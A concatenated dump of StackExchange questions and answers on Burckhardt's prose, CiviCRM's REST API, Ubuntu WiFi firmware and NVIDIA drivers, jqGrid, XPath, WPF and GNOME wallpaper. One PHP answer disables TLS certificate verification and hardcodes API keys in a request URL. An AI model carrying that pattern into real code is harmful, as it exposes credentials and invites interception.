world \n became possible. The subjective side at the same time asserted itself with \n corresponding emphasis: man became a spiritual individual, and recognized himself as such.\"25\n\n25 just references this.\nComment: I'm not entirely sure this is within the scope of history. I _think_ what the author is trying to say is merely that man needed to understand himself and his place in the universe. Historical methods can be used to decode overly flowery prose, but i'm not sure that history is the best tool here; literature or poetry might be more appropriate.\nComment: @kimchilover. Looks like an answer to me\nComment: This feels like it would be a better fit for EL&U.\nAnswer: Construing your question narrowly, as asking what \"turned within\" and \"turned without\" mean, the answer is plain. The first sentence of the passage in question is, in the original, \n\nIm Mittelalter lagen die beiden Seiten des Bewusstseins ---\n nach der Welt hin und nach dem Innern des Menschen selbst ---\n wie unter einem gemeinsmen Schleier tr\u00e4umend oder halbwach.\n\nGoogle Englishes it thus:\n\nIn the Middle Ages, the two sides of consciousness lay ---\n to the world and to the interior of man himself ---\n as if dreaming under a common veil or half awake.\n\nI would tinker, and say \n\nIn the Middle ages, both aspects of human consciousness --- the outward looking one facing the world, and the introspective one --- lay, in effect, under a veil, dreaming or half awake.\n\nBoth of which are close enough to the translation in your book.\nThe metaphor here is that consciousness is an eye, seeing either the outside world or one's inward nature. But a vile veil distorts what it sees, and (B goes on to say) the veil was first lifted in Italy.\nThe larger question, of what Burkhardt meant, or whether he was right, or why he was sure he was right, or what a well-educated mind should make of all of this, is beyond my ken or care.\n","meta":{"source":"history.stackexchange","title":"What did Jacob Burckhardt intend to say by 'turn within' and 'turn without'?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to use CiviCRM REST API in external PHP code\n\nQuestion: Been trying to get this to work for hours. Help would be greatly appreciated. userkey and sitekey are replaced with actual keys.\nI'm trying to run in a php file:\n<code>$result = curl -X POST \"https:\/\/www.mysite.org\/sites\/all\/modules\/civicrm\/extern\/rest.php?entity=Membership&action=get&api_key=userkey&key=sitekey&json={\"sequential\":1,\"return\":\"membership_type_id,id,end_date\",\"contact_id\":2,\"active_only\":1,\"options\":{\"limit\":1,\"sort\":\"join_date DESC\"}}\";\n<\/code>\nI get the error:\n<code>PHP Parse error: syntax error, unexpected 'POST' (T_STRING) in \/home\/spulver\/civicrmapi.php on line 3\n<\/code>\nAny ideas how to fix?\nAnswer: I use CURL to call rest api. Here is the snippet you can ignore\/remove many lines that sets curl variable.\n<code>$url = 'http:\/\/domain.org\/sites\/all\/modules\/civicrm\/extern\/rest.php?entity=Contact&action=getsingle&api_key=HR76BS710C&key=8c1cf9913fd674e08c8f27804334eb5a&json={\"id\":1}';\n\n$ch = curl_init();\n\/\/http:\/\/php.net\/manual\/en\/function.curl-setopt.php\n\/\/$ch = curl_init($url);\ncurl_setopt($ch, CURLOPT_URL, $url);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n\/\/curl_setopt($ch, CURLOPT_TIMEOUT, 5);\n\/\/curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\ncurl_setopt($ch, CURLOPT_ENCODING, \"\");\n\n\/\/for debugging?\ncurl_setopt($ch, CURLOPT_VERBOSE, true);\n\n$data = curl_exec($ch);\ncurl_close($ch);\n$obj = json_decode($data);\n<\/code>\nHTH\nPradeep\nAnswer: you need to replace the url parameters api_key and key with the relevant keys. \nMore information can be found in the developer documents.\nComment: in addition to @pradeep-nayak answer\nComment: Yes I have replaced the keys in my actual code. Not posting them here. THanks\n","meta":{"source":"civicrm.stackexchange","title":"How to use CiviCRM REST API in external PHP code","dup_signals":{}},"subset":"stackexchange"} +{"text":"WiFi is disconnecting intermittently on ACER E5-573G with a Linux platform\n\nQuestion: I dual booted my Laptop Acer Aspire E5-573G with Windows 10 and Ubuntu 18.04 and since the first day the WIFI is connecting and disconnecting frequently.\nI have been searching in others questions but I do not know to fix it on my own.\nFrom what I have learned from the other questions I leave here the results of the following commands:\n\nsudo lspci -v\n\n<code>03:00.0 Network controller: Qualcomm Atheros QCA9377 802.11ac Wireless Network Adapter (rev 30)\n Subsystem: Lite-On Communications Inc QCA9377 802.11ac Wireless Network Adapter\n Flags: bus master, fast devsel, latency 0, IRQ 52\n Memory at c4200000 (64-bit, non-prefetchable) [size=2M]\n Capabilities: [40] Power Management version 3\n Capabilities: [50] MSI: Enable+ Count=1\/8 Maskable+ 64bit-\n Capabilities: [70] Express Endpoint, MSI 00\n Capabilities: [100] Advanced Error Reporting\n Capabilities: [148] Virtual Channel\n Capabilities: [168] Device Serial Number 00-00-00-00-00-00-00-00\n Capabilities: [178] Latency Tolerance Reporting\n Capabilities: [180] L1 PM Substates\n Kernel driver in use: ath10k_pci\n Kernel modules: ath10k_pci\n<\/code>\n\ndmesg | grep ath10k\n\n<code>[ 3.139494] ath10k_pci 0000:03:00.0: pci irq msi oper_irq_mode 2 irq_mode 0 reset_mode 0\n[ 3.472128] ath10k_pci 0000:03:00.0: qca9377 hw1.0 target 0x05020000 chip_id 0x003820ff sub 11ad:0806\n[ 3.472131] ath10k_pci 0000:03:00.0: kconfig debug 0 debugfs 1 tracing 1 dfs 0 testmode 0\n[ 3.472641] ath10k_pci 0000:03:00.0: firmware ver WLAN.TF.2.1-00021-QCARMSWP-1 api 6 features wowlan,ignore-otp crc32 42e41877\n[ 3.539849] ath10k_pci 0000:03:00.0: board_file api 2 bmi_id N\/A crc32 8aedfa4a\n[ 5.738498] ath10k_pci 0000:03:00.0: unsupported HTC service id: 1536\n[ 5.757526] ath10k_pci 0000:03:00.0: htt-ver 3.56 wmi-op 4 htt-op 3 cal otp max-sta 32 raw 0 hwcrypto 1\n[ 5.841254] ath10k_pci 0000:03:00.0 wlp3s0: renamed from wlan0\n[ 8.151592] ath10k_pci 0000:03:00.0: unsupported HTC service id: 1536\n[ 352.551446] ath10k_pci 0000:03:00.0: unsupported HTC service id: 1536\n\n<\/code>\nThanks to all the people that is going to read this post and help me (and to others with the same\/similar problem).\nComment: Edit your question and show me `iwlist wlan0 scan | grep -i cell -A5`, changing wlan0 to your appropriate wireless device. What wireless network do you normally use? Post the output to paste.ubuntu.com and give me the URL. Start comments to me with @heynnema or I may miss them.\nComment: @heynnema\nThank you very much heynnema, but I have already fix the issue.\nAnswer: @heynnema\nThank you very much heynnema, but I have already fix the issue.\nI have modified this answers \"No Wifi on Acer Aspire E5 573 on any Linux Platform\" and \"https:\/\/esc.sh\/blog\/wifi-issue-on-acer-laptops-running-linux-qualcomm-atheros-device-0042\/\" and it work for the moment. I didn't want to try before because I don't understand very well what the different files are for, but I've taken a risk and it seems that work.\nMy solution:\n<code>git clone https:\/\/github.com\/kvalo\/ath10k-firmware.git\nsudo cp -r ath10k-firmware\/QCA9377 \/lib\/firmware\/ath10k\/\nsudo mv \/lib\/firmware\/ath10k\/QCA9377\/hw1.0\/CNSS.TF.1.0\/firmware-5.bin_CNSS.TF.1.0-00267-QCATFSWPZ-1 \/lib\/firmware\/ath10k\/QCA9377\/hw1.0\/firmware-5.bin\n<\/code>\nand again heynnema thank you very much for help me answering the question.\n","meta":{"source":"askubuntu","title":"WiFi is disconnecting intermittently on ACER E5-573G with a Linux platform","dup_signals":{}},"subset":"stackexchange"} +{"text":"X-Editable Select2 with key and value\n\nQuestion: In X-Editable using select2 tags, why can't we give key and value to select multiple values. is there any solution?\nAnswer: <code> $('#username').editable({\n source: [ {value: 1, text: 'Male'},\n {value: 2, text: 'Female'}],\n select2: {\n multiple: true, \/\/ for multiple select 2 values\n },\n pk: 1, \/\/ primary key\n url: 'post.aspx',\n name: 'username'\n });\n<\/code>\nComment: Please add some comments about your solution on why and how it solves the problem\nComment: use this file as a reference for all your use cases https:\/\/vitalets.github.io\/x-editable\/assets\/demo.js\nAbove mentioned javascript is a file behind x-editable demo\nhttps:\/\/vitalets.github.io\/x-editable\/demo-bs3.html?c=inline#\n","meta":{"source":"stackoverflow","title":"X-Editable Select2 with key and value","dup_signals":{}},"subset":"stackexchange"} +{"text":"c# wpf row definition\n\nQuestion: I need a help about some code. how can i split a row into two columns.My code is under this text.\n<code> <Grid.RowDefinitions>\n <RowDefinition Height=\"30\"\/>\n <RowDefinition Height=\"50\"\/>\n <RowDefinition Height=\"50\"\/>\n <RowDefinition Height=\"50\"\/>\n <RowDefinition Height=\"30\"\/>\n <RowDefinition Height=\"*\"\/>\n <\/Grid.RowDefinitions>\n <StackPanel Grid.Row=\"0\">\n<\/code>\nso how can i split row 0 into two columns, thanks\nAnswer: Put a <code>Grid<\/code> with 2 columns inside row 0 of the main <code>Grid<\/code>. Or, declare your grid as having 2 columns and set whatever you place in every row except row 0 with <code>ColumnSpan = 2<\/code>.\nAnswer: You just need to add \n<code><Grid.ColumnDefinitions>\n <ColumnDefinition Width=\"*\" \/>\n <ColumnDefinition Width=\"*\" \/>\n<\/Grid.ColumnDefinitions>\n<\/code>\nand then to put your StackPanel in the first row and the first column\n<code><StackPanel Grid.Row=\"0\" Grid.Column=\"0\" Grid.ColumnSpan=\"2\">\n<\/StackPanel >\n<\/code>\nand modify the span if you want a control to span over multiple cells\n","meta":{"source":"stackoverflow","title":"c# wpf row definition","dup_signals":{}},"subset":"stackexchange"} +{"text":"XPath to select an element if previous element contain a matching text() - Python, Scrapy\n\nQuestion: I want to extract an element if the previous elements text() matches specific criteria. for example,\n<code><html>\n<div>\n<table class=\"layouttab\">\n <tbody>\n <tr>\n <td scope=\"row\" class=\"srb\">General information:  <\/td>\n <td>(xxx) yyy-zzzz<\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Website:  <\/td>\n <td><a href=\"http:\/\/xyz.edu\" target=\"_blank\">http:\/\/www.xyz.edu<\/a>\n <\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Type:  <\/td>\n <td>4-year, Private for-profit<\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Awards offered:  <\/td>\n <td>Less than one year certificate<br>One but less than two years certificate<br>Associate's degree<br>Bachelor's\n degree\n <\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Campus setting:  <\/td>\n <td>City: Small<\/td>\n <\/tr>\n <tr>\n <td scope=\"row\" class=\"srb\">Related Institutions:<\/td>\n <td><a href=\"?q=xyz\">xyz-New York<\/a>\n (Parent):\n <ul>\n <li style=\"list-style:circle\">Berkeley College - Westchester Campus<\/li>\n <\/ul>\n <\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<\/div>\n<\/html>\n<\/code>\nNow, I want to extract the URL if the previous element has \"Website: \" in text() properties. \nI am using python 2.x with scrapy 0.14. I was able to extract data using individual element such as\n<code> item['Header_Type']= site.select('div\/table[@class=\"layouttab\"]\/tr[3]\/td[2]\/text()').extract()\n<\/code>\nBut this approach fails if the website parameter is missing and the tr[3] shift upward and i get 'Type' in website element and 'Awards offered' in Type.\nIs there a specific command in xPath like,\n<code>'div\/table[@class=\"layouttab\"]\/tr\/td[2] {if td[1] has text = \"Website\"}\n<\/code>\nThanks in advance.\nAnswer: For python and scrapy you should use following to select \"Type\" field,\nworked great for me.\n<code>item['Header_Type']= site.select('div[1]\/table[@class=\"layouttab\"]\/tr\/td[contains(text(),\"Type\")]\/following-sibling::td[1]\/text()').extract()\n<\/code>\nAnswer: <code>div\/table[@class=\"layouttab\"]\\tr\\td[text()=\"Website\"]\\following-sibling::node()<\/code> will work, I think. Otherwise, you could user <code>parent<\/code> and go to <code>td[2]<\/code> from there.\nAnswer: The following XPath will do:\n<code>\/html\/div\/table[@class='layouttab']\/tbody\/tr\/td[contains(text(),'Website')]\/following-sibling::td[1]\n<\/code>\nAnswer: This works for me:\n<code>\/html\/div\/table[@class=\"layouttab\"]\/tbody\/tr\/td[. = 'Website:\u00a0\u00a0']\/following-sibling::td\/a\/text()\n<\/code>\n\nDrill down till <code>td<\/code> and see if its text matches <code>Website:<\/code>\nUse <code>following-sibling<\/code> to go to the next <code>td<\/code>\nDrill down to retrieve the <code>a<\/code> and get the URL using <code>text()<\/code>\nAnswer: This will also work.. And is more generic..\n<code>\/\/table[@class='layouttab']\/\/td[contains(text(),'Website')]\/following-sibling::td\/\/text()\n<\/code>\nIf there is only one table on the page where u are extracting data then this will also work..\n<code>\/\/td[contains(text(),'Website')]\/following-sibling::td\/\/text()\n<\/code>\n","meta":{"source":"stackoverflow","title":"XPath to select an element if previous element contain a matching text() - Python, Scrapy","dup_signals":{}},"subset":"stackexchange"} +{"text":"unmet dependencies when Installing NVidia 460 driver\n\nQuestion: it seems I am not able to upgrade from 450 driver to 460. Following is the output:\n<code>$ nvidia-smi\nTue Mar 2 10:12:34 2021 \n+-----------------------------------------------------------------------------+\n| NVIDIA-SMI 450.102.04 Driver Version: 450.102.04 CUDA Version: 11.0 |\n|-------------------------------+----------------------+----------------------+\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\n| Fan Temp Perf Pwr:Usage\/Cap| Memory-Usage | GPU-Util Compute M. |\n| | | MIG M. |\n|===============================+======================+======================|\n| 0 GeForce GTX 1050 Off | 00000000:01:00.0 Off | N\/A |\n| N\/A 64C P0 N\/A \/ N\/A | 1086MiB \/ 2000MiB | 36% Default |\n| | | N\/A |\n+-------------------------------+----------------------+----------------------+\n \n+-----------------------------------------------------------------------------+\n| Processes: |\n| GPU GI CI PID Type Process name GPU Memory |\n| ID ID Usage |\n|=============================================================================|\n| 0 N\/A N\/A 1421 G \/usr\/lib\/xorg\/Xorg 192MiB |\n| 0 N\/A N\/A 6321 G \/usr\/lib\/xorg\/Xorg 459MiB |\n| 0 N\/A N\/A 6494 G \/usr\/bin\/gnome-shell 332MiB |\n| 0 N\/A N\/A 7090 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 8188 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 9017 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 9064 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 9227 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 9731 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 12448 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 24608 G \/usr\/lib\/firefox\/firefox 1MiB |\n| 0 N\/A N\/A 99825 G ...\/.steam\/ubuntu12_32\/steam 33MiB |\n| 0 N\/A N\/A 99834 G .\/steamwebhelper 1MiB |\n| 0 N\/A N\/A 99847 G ...AAAAAAAgAAAAAAAAA --log-f 39MiB |\n+-----------------------------------------------------------------------------+\n$\u00a0sudo apt install nvidia-driver-460\nReading package lists... Done\nBuilding dependency tree \nReading state information... Done\nSome packages could not be installed. This may mean that you have\nrequested an impossible situation or if you are using the unstable\ndistribution that some required packages have not yet been created\nor been moved out of Incoming.\nThe following information may help resolve the situation:\n\nThe following packages have unmet dependencies:\n nvidia-driver-460 : Depends: libnvidia-gl-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-extra-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: nvidia-compute-utils-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-decode-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-encode-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: nvidia-utils-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: xserver-xorg-video-nvidia-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-cfg1-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-ifr1-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Depends: libnvidia-fbc1-460 (= 460.39-0ubuntu0.20.04.1) but it is not going to be installed\n Recommends: libnvidia-decode-460:i386 (= 460.39-0ubuntu0.20.04.1)\n Recommends: libnvidia-encode-460:i386 (= 460.39-0ubuntu0.20.04.1)\n Recommends: libnvidia-ifr1-460:i386 (= 460.39-0ubuntu0.20.04.1)\n Recommends: libnvidia-fbc1-460:i386 (= 460.39-0ubuntu0.20.04.1)\n Recommends: libnvidia-gl-460:i386 (= 460.39-0ubuntu0.20.04.1)\n<\/code>\nI checked online and people say to do purge first, but I suspect that it won't work. I am wondering is there anyone went through the path of this upgrade? Or should I wait for the next driver?\nComment: Do you have the `restricted` repo enabled? `sudo add-apt-repository restricted` That is where those dependencies come from.\nComment: @Terrance yes, `'restricted' distribution component is already enabled for all sources.`\nComment: What version of Ubuntu are you running?\nComment: I use Ubuntu 20.04.\nAnswer: You may try <code>sudo apt --fix-broken install<\/code> but I am not sure if it'll solve your problem.\n\npeople say to do purge first, but I suspect that it won't work\n\nWhy do you suspect this? Per nvidia docs you have to purge the older version before you can install a new one. Try:\n<code>sudo apt purge nvidia-*\nsudo apt autoremove\n<\/code>\nYou might have to restart at this point (If you get a blank screen, don't panic. You can login using alt-ctrl-F1 and install the new nvidia driver or switch to using nouveau till your install is done)\nComment: I read some people said it didn't work for them. I suppose I should pick a day and try myself. I will still have gui after I purge (like swtich back to xorg)?\nComment: It is a bit cumbersome for sure, but has improved a lot in recent versions. You will still have your gui after restart (if you switch over to nouveau) but you can also work through a terminal\n","meta":{"source":"askubuntu","title":"unmet dependencies when Installing NVidia 460 driver","dup_signals":{}},"subset":"stackexchange"} +{"text":"Load HTML of SubGrid without its expansion in JQGrid\n\nQuestion: In my ASP.NET MVC application, I have JQGrid and its SubGrid but I noticed on <code>onSelectRow<\/code> event it is not detecting Subgrid rows until I expand main grid rows. I am trying to select main grid row and on select, all sub grid row's checkbox should be selected. But it is not finding any SubGrid. But when I expand then it works. Am I missing any property of Grid or Subgrid?\n<code>$(\"#MyGrid\").jqGrid({\n datatype: 'local',\n colModel: [\n {\n name: 'ColSelected', label: ' ', width: 40, sortable: false,\n formatter: 'checkbox', align: 'center', formatoptions: { disabled: false },\n editable: true, edittype: \"checkbox\", editoptions: { value: \"Yes:No\", defaultValue: \"Yes\" }\n },\n { name: 'ColName', label: 'Column Name', width: 340, editable: false, sortable: false }],\n height: '100%',\n autowidth: true,\n multiselect: false,\n beforeSelectRow: function (rowid, event) {\n \/\/some of my code\n return true;\n },\n onSelectRow: function (rowid, status, event) {\n \/\/some of my code\n\n },\n gridComplete: function () {\n \/\/some of my code\n },\n loadComplete: function () {\n \/\/some of my code\n },\n subGrid: true,\n subGridOptions: {\n \"plusicon\": \"ui-icon-triangle-1-e\",\n \"minusicon\": \"ui-icon-triangle-1-s\",\n \"openicon\": \"ui-icon-arrowreturn-1-e\",\n \"reloadOnExpand\": false,\n \"selectOnExpand\": false\n },\n subGridRowExpanded: function (subgrid_id, row_id) {\n var subgrid_table_id = subgrid_id + \"_t\",\n pager_id = \"p_\" + subgrid_table_id,\n localRowData = $(this).jqGrid(\"getLocalRow\", row_id);\n $(\"#\" + subgrid_id).html(\"<table id='\" + subgrid_table_id + \"'><\/table><div id='\" + pager_id + \"'><\/div>\");\n $(\"#\" + subgrid_table_id).jqGrid({\n datatype: \"local\",\n data: localRowData.LanguageNames,\n colNames: [' ', 'Languages'],\n colModel: [\n {\n name: 'ColSelected', label: ' ', width: 40, sortable: false,\n formatter: 'checkbox', align: 'center', formatoptions: { disabled: false },\n editable: true, edittype: \"checkbox\", editoptions: { value: \"Yes:No\", defaultValue: \"Yes\" }\n },\n { name: 'Language', label: 'Languages', align: 'center', width: 150 }\n ],\n idPrefix: \"s_\" + row_id + \"_\",\n pager: \"#\" + pager_id,\n autowidth: true,\n sortname: \"num\",\n sortorder: \"asc\",\n height: \"55\",\n beforeSelectRow: function (rowid, event) {\n \/\/some of my code\n return true;\n },\n onSelectRow: function (rowid) \/\/some of my code\n },\n loadComplete: function () {\/\/some of my code\n }\n }).jqGrid('navGrid', \"#\" + pager_id, { edit: false, add: false, del: false });\n }\n });\n<\/code>\nAnswer: If I correctly understand the problem you can use the options selectOnExpand and selectOnCollapse (which are sbgrid options). By default they are false.\nI recommend you to consult the docs here\nComment: As I said if use **selectOnExpand** event then all HTML of subgrid will be prepared and I don't have problem there. But I want all subgrid table row and table data without expanding.\nComment: Not sure I understand, but data is loaded only if you expand it. You set reloadOnExpand to false, which is a solution, but the data should be already be loaded (i.e you should expand it once to get the html)\n","meta":{"source":"stackoverflow","title":"Load HTML of SubGrid without its expansion in JQGrid","dup_signals":{}},"subset":"stackexchange"} +{"text":"Custom small sized wallpapers in Ubuntu 17.10\n\nQuestion: When setting a wallpaper in Ubuntu 17.04 I could choose from tile, zoom, center, scale, fill or span options. \nWhere can I found option for 'center' wallpaper behaviour in Ubuntu 17.10?\n\nBackground: I use two monitors with different resolutions. So I was more than happy to use small image as a wallpaper with white colour filling the rest of the screen. \nThis was done through All Settings -> Appearance -> Look tab in Unity, where I could select option \"center\" and white colour to fill the rest.\nAfter updating to Ubuntu 17.10 I was not able to select my custom wallpaper from Background -> Wallpaper menu, so I went to the directory with the image and tried to \"Set as Wallpaper\" option in the menu, but it zoomed image to every screen resolution (it looks awful).\nSo I wonder - How can I set wallpaper to be centred without zoom and to use plain white colour for all the space left?\nComment: Related to: [Why aren't my pictures appearing in the \"pictures\" section of the change wallpapers window?](https:\/\/askubuntu.com\/questions\/960601\/why-arent-my-pictures-appearing-in-the-pictures-section-of-the-change-wallpap)\nAnswer: You may try using (GNOME) Tweaks. You may install it by running\n<code>sudo apt install gnome-tweak-tool\n<\/code>\nLaunch Tweaks and go to Desktop section and select \"Centered\" in Adjustment under Background:\n\nTo fill the rest of your background with while colour, run\n<code>gsettings set org.gnome.desktop.background primary-color '#FFFFFF'\n<\/code>\n(Or follow the advanced option of my answer here: \nChange background color to pitch black , for white you'll have to use <code>#FFFFFF<\/code> instead of <code>#000000<\/code>). \nComment: Thank you. I've installed `dconf-editor` and set *primary-color* to `#FFFFFF` for `\/org\/gnome\/desktop\/background\/`. It did the trick!\nComment: Cool, thanks. I was able to centered image as suggested! How can I change background colour to be white?\nComment: @StanislavBondarenko Also added a command-line way to change the background colour easily so that one doesn't have to use *dconf Editor*.\n","meta":{"source":"askubuntu","title":"Custom small sized wallpapers in Ubuntu 17.10","dup_signals":{}},"subset":"stackexchange"} +{"text":"What phase does stopPropagation effect?\n\nQuestion: According to quirksmode, modern browsers have a capturing phase and a bubbling phase. See here.\nIf I use stopPropagation in my event handler ( set to either phase by the Boolean argument ) how will it function?\nWill it work both ways? That is if I set it to capture mode, will it also prevent the bubbling phase. And vice-versa as well.\nHere is the W3 reference ( stopPropagation ).\nI'm troubleshooting an event handler, and need to understand exactly how <code>stopPropagation()<\/code> functions.\nAnswer: Stopping propagation during the capture phase will prevent further handlers from running, including handlers registered with the bubbling phase.\nThe W3C documentation on event flow says (emphasis mine):\n\nThis specification defines three event phases: capture phase; target\n phase; and bubble phase. Event objects complete these phases in the\n specified order using the partial propagation paths as defined below.\n A phase must be skipped if it is not supported, or if the event\n object's propagation has been stopped. For example, if the\n <code>Event.bubbles<\/code> attribute is set to false, the bubble phase will be\n skipped, and if <code>Event.stopPropagation()<\/code> has been called prior to the\n dispatch, all phases must be skipped.\n","meta":{"source":"stackoverflow","title":"What phase does stopPropagation effect?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is the difference between Policy15 and Policy12?\n\nQuestion: I've got a basic service host:\n<code>m_host = new ServiceHost(m_service, m_baseAddress);\nServiceMetadataBehavior behavior = new ServiceMetadataBehavior();\nbehavior.HttpGetEnabled = true;\nbehavior.MetadataExporter.PolicyVersion = PolicyVersion.Policy15;\nm_host.Description.Behaviors.Add(behavior);\nm_host.AddServiceEndpoint(\n typeof(IManagerService), \n new BasicHttpBinding(), m_soapAddress);\nm_host.Open();\n<\/code>\nMy question is how do I know which PolicyVersion to use? The MSDN is not very helpful, it seems to think I should know already if I want 1.2 or 1.5...\nPolicyVersion.Policy15 Property\nPolicyVersion.Policy12 Property\nComment: I think as long as you are consuming your own services, you probably don't have to worry about the policy version. If you have to expose your service to others that have specific policy version requirements, that's a different story. I would probably just go with the defaults unless you're actually having specific problems with the policy version and your metadata. In that case, you probably want to put that in your question.\nComment: I don't know the answer but appreciate the question. But [here's a list of changes from 1.2 to 1.5](http:\/\/markmail.org\/message\/rwlwlc4yop4vfgyr) in case you understand what they are talking about.\nComment: Are there old clients that only support 1.2 that I need to be aware of? Or is this all server side processing and I should always use the latest my framework supports?\nComment: I solved the actual problem I was having with metadata, this was just one stop on my investigation that I was not able to resolve. FYI this solved my actual problem, which is not directly related to this question: http:\/\/msdn.microsoft.com\/en-us\/library\/aa738489(v=vs.100).aspx\nComment: @Tombala when you say leave it at default, are you suggesting the policy version be not even set? All the MSDN examples manually set this value.\nComment: Actually, have you considered just exposing your service MEX endpoint using web.config preferences instead of writing code? Are you hosting your service outside of IIS through some windows service or something?\nComment: I'm using code instead of doing it all in config because the requirements call for some of the parameters to come from the customer's config file instead.\nComment: Ouch! Darn those requirements. :) I'm not sure what the default value for PolicyVersion would be. You should post your final code in its working condition and accept it as the answer.\nComment: I think you should post your link from your first comment and I'd accept that as the answer. The question had little to do with the problem I was debugging when I thought to ask it.\nAnswer: In case others wonder what changes there were from 1.2 to 1.5, here's a link that gives a list of changes.\nFrom Denise, MSDN has an article about how to publish your own metadata using code that helped get this running that you can find here.\nComment: BTW, the code as posted ran just fine on localhost, but didn't work across the network.\nComment: @DeniseSkidmore Did your service url have an IP address of `0` or `0.0.0.0`? If not, it might not be binding to the right IP. You also need to add a firewall exception for the appropriate port(s)\nComment: Nope. Not it. As noted in the comments below the question, the issue was in my metadata.\n","meta":{"source":"stackoverflow","title":"What is the difference between Policy15 and Policy12?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Add value from column based on other column through loop\n\nQuestion: I have the following data frame:\n<code>ViewKey Table_Name\ncar A\ncar B\nNaN C\nball D\nball E\n<\/code>\nand the following sentences:\n<code>contains_car = \" SELECT \\n keys \\n FROM *letter here* \\n LEFT JOIN \"\ncontains_ball = \" SELECT \\n keys \\n FROM *letter here* \\n RIGHT JOIN \"\ncontains_NaN = \" SELECT \\n keys \\n FROM *letter here* \\n ALL\"\n<\/code>\nI want to <code>\"print\"<\/code> with the following idea:\nIf my raw contains <code>car<\/code> print <code>contains_car<\/code> value but instead of <code>*letter here*<\/code> write corresponding value of column <code>Table_name<\/code>:\n<code># as it related to \"car\" value in the column it printed contains_car value. \n# And at the same time instead of *letter here* wrote A because for the first car value A is corresponding:\n\nSELECT \n keys \n FROM A\n LEFT JOIN\n\n SELECT \n keys \n FROM B \n LEFT JOIN\n\n SELECT \n keys \n FROM C\n ALL\n\n SELECT \n keys \n FROM D \n RIGHT JOIN\n\n SELECT \n keys \n FROM E \n RIGHT JOIN\n<\/code>\nI tried:\n<code>for i in df['ViewKey'].fillna(\"0\"):\n if 'car' in i:\n print(contains_car)\n elif 'ball' in i:\n print(contains_ball)\n elif '0' in i:\n print(contains_NaN)\n<\/code>\nIDK where to put if conditions\nAnswer: I think this should work for you:\n<code>df = df.fillna(\"0\")\nfor index, row in df.iterrows():\n if \"car\" in row['ViewKey']:\n print(contains_car.replace(\"*letter here*\", row['Table_Name']))\n if \"ball\" in row['ViewKey']:\n print(contains_ball.replace(\"*letter here*\", row['Table_Name']))\n if \"0\" in row['ViewKey']:\n print(contains_NaN.replace(\"*letter here*\", row['Table_Name']))\n<\/code>\nAnswer: If I understand your question correctly, then you can get your output without if-statements. If your dataframe name is <code>df<\/code>:\n<code>for index, row in df.iterrows():\n print(\"SELECT \\n keys \\n FROM {0} \\n {1}\\n\".format(row['Table_Name'], row['ViewKey']))\n<\/code>\nComment: A apologize for my question. I have changed it. Sorry for the time you spent\nAnswer: <code>for index, rows in df.iterrows():\n print(\"SELECT \\n keys \\n FROM {} \\n {} \\n\".format(row['Table_Name'], row['ViewKey']))\n<\/code>\nAbove is the code to simply print your requirement. If you want to do via loop, as you specified in the problem, then a problem that will arise is that <code>df['Table_Name'][df['ViewKey'] == 'car']<\/code> will output both 'A' and 'B', while only 1 is required at a time for printing. This will require 5 different ifs, which is absolutely unnecessary.\nComment: A apologize for my question. I have changed it. Sorry for the time you spent\nComment: Its alright @EndryCrue. Hope it helps some other solution seekers\n","meta":{"source":"stackoverflow","title":"Add value from column based on other column through loop","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ubuntu 22.04.01: freeze-ups on refreshing from locked screen\n\nQuestion: After I upgraded to Ubuntu 22.04.01 last week, I have occasional freeze-ups on refreshing from a locked screen. My lock-screen requires my password to complete the re-opening. The freeze-ups occur about every fourth time. To recover, I have to power the desktop off and then restart. Obviously, an annoyance that I never had in 20.04. Any suggestions?\n\nNow, about a month later, with a belated thank-you to Mossroy for his workaround. However, something seems to have been fixed in the underlying software. I have not had any of the above-mentioned freeze-ups since October 6, with about a fifty flawless wake-ups after that. Someone among the Ubuntu update maintainers must have learned about the problem -- perhaps even from here -- and fixed it. There has been at least one, maybe several, system updates since that last freeze-up.\n\nMy first answer is not entirely correct, and it may have been unfair for me to put the blame on the Super-L keystroke. Letting the screen lock happen with the automatic delay, I find, now also leads to occasional freeze-ups. However, I have now discovered that I do not have to power-down-and-up to restart. If I have typed my log-in password completely, despite the frozen password-entry box, if I wait about 40 seconds, the screen goes black. After another lengthy wait, also probably less than a minute, the machine wakes up and displays my desktop! And nothing seems to have been lost in the process.\n\nI am now pretty sure where the trouble was. I was in the habit of locking the screen with the Super-L keystroke, and that may where the freeze-ups come from. When I (finally!) opened up the Ubuntu Settings, I discovered (under Privacy > Screen) that the Automatic Screen Lock was not on. Turning it on and adjusting the 